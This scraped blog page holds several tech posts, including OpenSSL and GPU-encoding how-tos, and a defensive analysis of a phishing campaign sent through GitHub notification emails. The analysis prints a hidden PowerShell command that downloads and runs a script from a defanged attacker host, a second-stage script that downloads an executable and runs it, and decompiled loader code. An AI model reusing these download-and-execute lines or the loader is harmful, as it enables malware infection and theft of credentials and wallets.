Recently I found myself needing to generate an HTTPS server certificate and private key for an iOS app using OpenSSL. What surprised me was the near-total lack of documentation for OpenSSL: while there is plenty of function-level documentation, what OpenSSL really lacks is examples of how it all fits together. It's like having all of the pieces of a puzzle, but no picture of what the finished product will look like. Many online examples are insecure or make use of deprecated functions, a serious concern considering the consequences. This tutorial covers the basics of how to generate an RSA or ECDSA private key and an X.509 server certificate for your application in C. For this tutorial, we will be using OpenSSL 1.1.0f. Important note: this tutorial is written for the modern version of OpenSSL, 1.1.x, and is not backwards compatible with OpenSSL 1.0.x. If you are still on the 1.0.x train, it's highly recommended that you upgrade your application.

Generating the Private Key

A private key is...
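The excerpt above covers the C API; for orientation, these are the equivalent openssl command-line invocations (my own sketch, not taken from the tutorial; file names are arbitrary):

```shell
# Generate an RSA-2048 private key, then a self-signed X.509 certificate for it.
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out server.key
openssl req -new -x509 -key server.key -subj "/CN=localhost" -days 365 -out server.crt

# An ECDSA key (P-256 curve) can be generated the same way:
openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:P-256 -out server-ec.key
```

The C code in the tutorial performs these same steps programmatically through the EVP APIs.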
over a year ago


More from Ian's Blog

Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relatively painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post documents what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU.

This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you.

Driver Setup

The drivers for Intel Arc cards were added to the Linux kernel in version 6.2, but RHEL 9 uses kernel version 5. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9.

Add the Intel Repo

Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists.

```
[intel-graphics-9.4-unified]
name=Intel graphics 9.4 unified
enabled=1
gpgcheck=1
baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/
gpgkey=https://repositories.intel.com/gpu/intel-graphics.key
```

Run dnf clean all for good measure.

Install the Software

```shell
dnf install intel-opencl \
    intel-media \
    intel-mediasdk \
    libmfxgen1 \
    libvpl2 \
    level-zero \
    intel-level-zero-gpu \
    mesa-dri-drivers \
    mesa-vulkan-drivers \
    mesa-vdpau-drivers \
    libdrm \
    mesa-libEGL \
    mesa-lib
```

Reboot your machine for good measure.
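Since the baseurl must match your point release, a small sketch (assuming the URL scheme from the repo file above) for deriving it from /etc/redhat-release:

```shell
# Derive the point release (e.g. "9.4") for the repo baseurl.
# A sample string is used here; on a real system use: release=$(cat /etc/redhat-release)
release='Rocky Linux release 9.4 (Blue Onyx)'
ver=$(printf '%s\n' "$release" | grep -o '[0-9]\+\.[0-9]\+' | head -1)
echo "baseurl=https://repositories.intel.com/gpu/rhel/${ver}/unified/"
```

Check that the printed URL actually exists in a browser before running dnf.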
Verify Device Availability

You can verify that your GPU is seen using the following:

```shell
clinfo | grep "Device Name"
```

```
Device Name    Intel(R) Arc(TM) A750 Graphics
Device Name    Intel(R) Arc(TM) A750 Graphics
Device Name    Intel(R) Arc(TM) A750 Graphics
Device Name    Intel(R) Arc(TM) A750 Graphics
```

ffmpeg Setup

Install ffmpeg

ffmpeg needs to be compiled with libvpl support. For simplicity's sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary.

Verify ffmpeg support

If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following:

```shell
./ffmpeg -hide_banner -encoders | grep "qsv"
```

```
V..... av1_qsv      AV1 (Intel Quick Sync Video acceleration) (codec av1)
V..... h264_qsv     H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264)
V..... hevc_qsv     HEVC (Intel Quick Sync Video acceleration) (codec hevc)
V..... mjpeg_qsv    MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg)
V..... mpeg2_qsv    MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video)
V..... vp9_qsv      VP9 video (Intel Quick Sync Video acceleration) (codec vp9)
```

If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly.

Converting a Video

I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container. I'll skip doing any other transformations to the video for now, just to keep things simple.

```shell
./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4
```

The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec.
Let's see what kind of difference using hardware acceleration makes:

Encoder             | Time     | Average FPS
--------------------|----------|------------
h264_qsv (Hardware) | 3.02s    | 296
libx264 (Software)  | 1m2.996s | 162

Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there are lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.
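The 95% figure can be recomputed from the two wall-clock times in the table (1m2.996s is 62.996 seconds):

```shell
# Percentage reduction in encode time: hardware 3.02 s vs software 62.996 s.
awk 'BEGIN { hw = 3.02; sw = 62.996; printf "%.0f%% faster\n", (1 - hw/sw) * 100 }'
# prints: 95% faster
```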

4 months ago
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites left me with a profound longing for a time when having a website was a novel and enjoyable experience.

The Start

Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But that's a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010s were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024.

Graphic Design was Never My Passion

2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't care so much about the final product as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as my interests grew.
In the very early 2010s I thought I wanted to go into web design, but after having suffered through 4 months of the most dysfunctional art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself.

Changing Interests

As my interests changed, my focus became less about the design and appearance of the site and more about what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore.

When Things Stopped Being Fun

Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and scaling.

Cloudflare

A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors. All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues with Cloudflare, at least as far as this blog post is concerned. For example, before Let's Encrypt existed, Cloudflare did not allow for TLS at all on their free plans.
This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either: even though Cloudflare now offers free TLS, they have total control over everything and the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster.

Scaling (or lack thereof)

The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, global CDNs, monitoring, automated deployments, telemetry, an obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, and not just with websites: people think they need to be concerned about scaling problems without first asking if those problems apply, or will ever apply, to them. If I was able to host my website just fine from an abused desktop tower with blown caps on cable internet, then why in the world would I need to obsess over telemetry and response times? Sadly, things only got worse when I got into cybersecurity, because on top of all the concerns with performance and scale, I was now trying to protect myself from exceedingly unlikely threats. Until embarrassingly recently, I was using complicated file integrity checks with hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site.
For some reason, I had built a threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder that I ended up making my site look like a resume, when any change to it was so much work?

The Lesson I Learned

All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me to the realization of the true root cause of my misery: in an attempt to mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and came up with a much better, simpler, and, most of all, enjoyable design.

How my Website Used to Work

The last design of my website before I came to the conclusions discussed above was as follows: my website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registries. Cloudflare sat in front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to Github.
A Github action would then deploy that image to Azure Container Registries and trigger the container to restart, pulling the new image.

How my Website Works Now

Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now. Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Let's Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but, crucially, nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's virtually identical to the way I was doing things in 2013, and it's been invigorating to shed this excess weight and unnecessary complication. But there's actually a whole lot going on behind the scenes that I'm omitting from this graph.

Static Websites Are Boring

A huge problem with my previous design is that I had locked myself into a purely static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites usually depends on JavaScript running in the user's browser. That's lame. Let's take a really simple example: sometimes I want to show a banner at the top of my website. On a static-only site, unless you hard-code that banner into the HTML, doing this would require JavaScript to ask some backend whether a banner should be displayed and, if so, render it. But on a dynamic page, where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from containers, which are ephemeral and immutable, to a virtual machine, which isn't, and going back to server-side rendering.
I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but by my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, this has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this, but I've written enough about websites for one day.

Wrapping Up

That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from self-imposed judgement or concern over non-issues. Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

4 months ago
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub. Most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request, or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you: it's happened to me. Twice. In one day.

Let me break down how this attack works:

1. The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos
2. The attacker quickly deletes the issue
3. You receive a notification email as the owner of the repo
4. You click the link in the email, thinking it's legitimate
5. You follow the instructions and infect your system with malware

Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub's email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got. In text form (link altered for your safety):

Hey there!
We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue.
Best regards,
Github Security Team

Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing that would tell you so, because the majority of this email is controlled by the attacker.
Everything highlighted in red is, in one way or another, something the attacker can control, meaning the text or content is what they want it to say. Unfortunately, the remaining parts of the email that aren't controlled by the attacker don't provide sufficient context to know what's actually going on. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from Github, it passes most of the common phishing checks: the email is from Github, and the link in the email goes to where it says it does.

GitHub can improve these notification emails to reduce the effectiveness of this type of attack by providing more context about what action the email is for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted Github security (the real one, not the fake imposter one) and shared these emails with them along with my concerns.

The Website

If you were to follow the link in that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare, which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human all that out of the ordinary. What is out of the ordinary is how the captcha works. Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site asks you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it.
Sadly, it's not real, so now let's take a look at the malware.

The Malware

The site put the following text in my clipboard (link modified for your safety):

```
powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"
```

We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is equivalent to calling curl | bash. The comment at the end of the line, combined with the Windows Run box's limited window size, effectively hides the first part of the command, so the user only sees the "I am not a robot" portion.

Between the first email I got and the time of writing, the URL in the script has changed, but the contents remain the same. Moving on to the second stage, the contents of the evaluated script file are (link modified for your safety):

```powershell
$webClient = New-Object System.Net.WebClient
$url1 = "[https://]github-scanner[.]com/l6E.exe"
$filePath1 = "$env:TEMP\SysSetup.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\SysSetup.exe
```

This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid, meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature is itself interesting, because it highlights two weaknesses in Windows that this malware exploits.
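The curl | bash comparison can be made concrete with a harmless local stand-in (my own illustration, not part of the attack): any text piped into an interpreter gets executed, which is exactly the shape of iex (iwr ...).Content.

```shell
# Harmless local stand-in for the pipe-to-interpreter pattern.
# The "downloaded" script here is just a local file, not a remote URL.
printf 'echo payload-ran\n' > /tmp/fake-payload.sh
cat /tmp/fake-payload.sh | bash    # same shape as: curl -s https://... | bash
# prints: payload-ran
```

This is why pasting commands you don't understand, whether into a terminal or the Windows Run box, is dangerous: the fetch and the execute happen in one step with no chance to inspect the payload.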
I would have assumed that Windows would warn you before running an exe with an invalid code signature, especially one downloaded from the internet, but it turns out that's not entirely the case. It's important to know how Windows determines whether something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of a file that says it came from the internet. Browsers and other software can set this flag, and other software can look for it and behave differently. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature.

But this warning never appears for the victim, and it has to do with the mark of the web. Step back for a moment and you'll recall that it's not the browser that downloads this malicious exe; it's PowerShell, or, more specifically, the System.Net.WebClient class in .NET Framework. This class has a method, DownloadFile, which does exactly that: downloads a file to a local path. Except this method does not set the MOTW flag on the downloaded file. Take a look at this side-by-side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right. This exposes the other weakness in Windows: Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the mark of the web. It is unwise to rely on the mark of the web in any way, as it's trivially easy to remove that flag. Had the .NET library set that flag, the attacker could have easily removed it before starting the process.
Both of these weaknesses have been reported to Microsoft, but for now we should stop getting distracted by code signing certificates and move on to looking at what this dang exe actually does. I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There are two parts of the code that matter: the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, marks a region of memory as executable with VirtualProtect, and then executes it with CallWindowProcW.

```csharp
private static void Main(string[] args)
{
    Resolver resolver = new Resolver("Consulter", 100);
    Program.FreeConsole();
    double num = (double) Program.UAdhuyichgAUIshuiAuis();
    Task.Run((Action) (() =>
    {
        Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco);
        Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key);
    }));
    Thread.Sleep(1000);
    uint ASxcgtjy = 0;
    Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy);
    int index = 392;
    Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0);
}
```

The PersonalActivation function takes a list and two byte arrays. The list parameter is not used; the first byte array is a data buffer and the second is labeled key. This, plus the amount of math being done, gives away that it is some form of decryptor, though I'm not good enough at math to figure out which algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW, compiled the rest of the code, and ran it in a debugger so that I could examine the contents of the two decrypted buffers.
The first buffer contains a call to CreateProcess:

```
00000000  55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72  U...7.......user
00000010  33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F  32.dll.CreatePro
00000020  63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C  cessA.VirtualAll
00000030  6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74  oc.GetThreadCont
00000040  65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D  ext.ReadProcessM
00000050  65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C  emory.VirtualAll
00000060  6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73  ocEx.WriteProces
00000070  73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61  sMemory.SetThrea
00000080  64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54  dContext.ResumeT
00000090  68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00  hread.9...¼.....
000000A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000B0  00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73  ......C:\Windows
000000C0  5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46  \Microsoft.NET\F
000000D0  72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30  ramework\v4.0.30
000000E0  33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37  319\RegAsm.exe.7
[...]
```

And the second buffer, well, just take a look at the headers and you might just see what's going on :)

```
00000000  4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00  MZx.............
00000010  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00  ............x...
00000040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..´.Í!¸.LÍ!Th
00000050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
00000060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
00000070  6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00  mode.$..PE..L...
```
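The 4D 5A ("MZ") bytes at offset 0 of the second buffer are the DOS executable magic number that every Windows PE file starts with. A quick way to check any blob for it (a sketch using a synthetic file standing in for the dumped buffer):

```shell
# Write the first few bytes of the dumped buffer to a file, then check the magic.
printf 'MZx\000\001' > /tmp/buffer.bin
if [ "$(head -c 2 /tmp/buffer.bin)" = "MZ" ]; then
    echo "looks like a DOS/PE executable"
fi
# prints: looks like a DOS/PE executable
```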
So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks as executable, and then executes. Marvelous. Sadly, this is where I hit a wall, as my skills at reverse engineering are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is.

Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers, where the gang can move on to either stealing money from you or profiting from selling your data online. Lumma's malware tends not to encrypt victims' devices the way traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma.

If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in Github's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were: Windows Sandbox, Ghidra, dotPeek, HxD, and Visual Studio.

Updates: Previously I said that the codesigning certificate was stolen from Spotify; however, after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

5 months ago
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st, 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations.

Looking Back

I joined Cohost in October of 2022, when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account, switched to using Cohost only, and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, built not on advertising, corporate greed, and privacy invasion, but on a focus on people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made; it's the dark cloud that has now formed over the people who shared that vision, and the rise of the question "why bother".

When I look back on my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there; some of us scattered to various places, while others decided to take their leave from social media entirely. I am sad knowing that, despite my best efforts to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it.
Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like counts meant that Cohost could never be a popularity contest, and that is something that seemingly no other social media site has come to grips with.

The Alternatives

Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult-to-understand web of protocols, services, terminology, and dogma. It suffers from a critical "open source brain worm", where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people take part in the community, and excludes so many others. Bluesky is the worst of both worlds: technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate whether that includes copying some of twitter's worst mistakes.

Looking Forward

When it became clear that I was going to walk away from my twitter account, there was fear and anxiety. I knew that I would lose connections, some of which I had worked hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-knit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright.
So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

5 months ago 8 votes
Why my Apps Aren't Available on Apple Vision Pro

Recently I have received some questions from users of both TLS Inspector and DNS Inspector enquiring why the apps aren't available on Apple's new Vision Pro headset. While I have briefly discussed this over on my Mastodon, I figured it might be worthwhile putting things down with a bit more permanence. There are two main reasons why I am not making these apps available on the platform: exclusivity and support.

A Future of Computing, If You Can Afford It

Apple loudly and proudly calls their new headset the future of computing, marshalling us into the age of spatial computing. However, at US$3,500, some (myself included) would say that this future is only available to those who can afford it. Three thousand five hundred dollars is, in no small terms, a lot of money for those on a budget, and firmly places this item in the category of expensive toy.

TLS and DNS Inspector are free apps that I spend a great deal of effort making available to as many people as possible. I work to ensure that the apps function on the oldest supported iOS versions so that those who can't afford a new smartphone every year can still use my apps. Ultimately it comes down to a choice: do I work to support legacy devices and versions to help more people who can't afford expensive upgrades, or do I support a grossly expensive toy-like device for people who have more money than sense? To me, the answer is Pretty Fucking Obvious.

I personally do not currently care that the app is unavailable on these platforms, but if you already have one and are bothered by this, you can afford to donate to me to convince me it's a worthwhile investment. If you have enough money to buy an expensive toy, you have enough money to support a free and open source tool.

Supporting a Device I Don't Own

When Apple launched the Vision Pro they only made it available in the US market. Apple has a tendency to do this, and it's always felt like a weird decision.
Why launch a "great" new product if the majority of the world can't actually buy it? If you ask me, it sure does have a strong whiff of American elitism to it.

This is what US$3,500 gets you. Image: Apple.

Despite this, I saw other Canadians race down across the border to buy a new headset. A year later, Apple made the Vision Pro available in a few more markets, including Canada, at CA$5,000. Five thousand dollars.

If you didn't already know, supporting TLS and DNS Inspector does, in fact, cost me money. At a minimum I have to spend CA$100 a year on an Apple developer membership, plus the cost of a suitable macOS device to build the software. I am happy to spend this money to support the community of users of my apps, but CA$5,000 is so far beyond what I am capable of spending on something I already know I won't use outside of development.

The Vision Pro, like all other VR devices, does not interest me. I've played around with a friend's VR headset and found it to be novel, but not groundbreaking enough to be worth the cost. Also like other VR devices, there is a major lack of content available for it. Most VR games are either also playable outside of VR, or are glorified tech demos desperately trying to distract you from your buyer's remorse. Apple is struggling with this same issue on the Vision Pro: in its first year of existence, all they've really been able to muster is spatial video. Something to entertain you for a few minutes, maybe an hour, before the headset goes in a box to sit unused.

What Will Change My Mind

As it stands, the way I see it there are only two things that will change my mind on this:

1. The price of the Vision Pro is cut by at least 50%
2. Somebody gives me a Vision Pro

I think we all know that #1 is never going to happen, so if you feel strongly enough that TLS and DNS Inspector need to be on the Vision Pro, you can email me to discuss your donation of a device ;)

7 months ago 10 votes

More in technology

On Lenny’s Podcast

One of my must-read newsletters for the past several years has been Lenny’s Newsletter, probably best known for its writing on growth and product management, which really means it covered everything you need to create a great company. It expanded into a really well-done podcast; Lenny has always had a knack for finding the best … Continue reading On Lenny’s Podcast →

14 hours ago 3 votes
Apple’s new iPads are here, let’s break them down

Another day, another opportunity to rate my 2025 Apple predictions! iPad Here’s what I predicted would happen with the base iPad this year: I fully expect to see the 11th gen iPad in 2025, and I think it will come with a jump to the A17 Pro or

11 hours ago 2 votes
A lightweight file server running entirely on an Arduino Nano ESP32

Home file servers can be very useful for people who work across multiple devices and want easy access to their documents. And there are a lot of DIY build guides out there. But most of them are full-fledged NAS (network-attached storage) devices and they tend to rely on single-board computers. Those take a long time […] The post A lightweight file server running entirely on an Arduino Nano ESP32 appeared first on Arduino Blog.

14 hours ago 2 votes
The battle of the budget phones

Just days after I got my iPhone 16e, Apple's (less) budget (than ever before) iPhone, Nothing is out here with their new budget phones, the Phone (3a) and (3a) Pro. These models start at $379 and $459 respectively, so they certainly undercut the new iPhone.

14 hours ago 2 votes
The New Leverage: AI and the Power of Small Teams

This weekend, a small team in Latvia won an Oscar for a film they made using free software. That's not just cool: it's a sign of what's coming.

Sunday night was family movie night in my home. We picked a recent movie, FLOW. I'd heard good things about it and thought we'd enjoy it. What we didn't know was that as we watched, the film won this year's Academy Award for best animated feature. Afterwards, I saw this post from the movie's director, Gints Zilbalodis:

We established Dream Well Studio in Latvia for Flow. This room is the whole studio. Usually about 4-5 people were working at the same time including me. I was quite anxious about being in charge of a team, never having worked in any other studios before, but it worked out. pic.twitter.com/g39D6YxVWa — Gints Zilbalodis (@gintszilbalodis) January 26, 2025

